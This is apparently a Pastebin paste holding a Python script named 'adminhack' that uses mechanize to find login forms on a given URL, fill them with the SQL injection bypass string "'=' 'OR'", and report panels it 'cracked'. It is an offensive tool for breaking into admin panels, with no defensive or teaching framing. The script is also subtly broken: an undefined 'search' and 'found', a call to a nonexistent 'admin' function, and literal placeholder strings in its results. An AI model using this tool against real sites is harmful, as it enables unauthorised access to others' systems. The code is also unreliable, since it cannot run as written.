Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import mechanize, sys
- url = sys.argv[1]
- br = mechanize.Browser()
- br.set_handle_robots(False)
- br.addheaders = [('User-agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11)Gecko/20071127 Firefox/2.0.0.11')]
- def adminhack(url):
- curr = 0
- br.open(url)
- forms = br.forms()
- if forms:
- for f in forms:
- f = str(f)
- print(f)
- username = search(r"<TextControl\(.*=\)>", f)
- password = search(r"<PasswordControl\(.*=\)>", f)
- if username:
- user = (username.group().split('<TextControl(')[1][:-3])
- if password:
- passw = (password.group().split('<PasswordControl(')[1][:-3])
- print(user)
- print(passw)
- else:
- curr += 1
- else:
- curr += 1
- if(username and password):
- br.select_form(nr=curr)
- br.form[user] = "'=' 'OR'"
- br.form[passw] = "'=' 'OR'"
- resp = br.submit()
- data = resp.read()
- if('username or password' in data or 'Failed' in data or 'incorrect' in data or 'Invalid' in data):
- found.append(' | Failed to crack the panel')
- elif(' Log Out' in data or 'administrator' in data):
- founds = (' | URL: ' + 'url' + ' | Login: ' + 'login' + ' | Password: ' + 'password')
- found.append(founds)
- else:
- print(' | Failed to crack the panel')
- else:
- print(' | Not Found Form')
- findpage = '\n'.join(found)
- return findpage
- print(admin(url))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement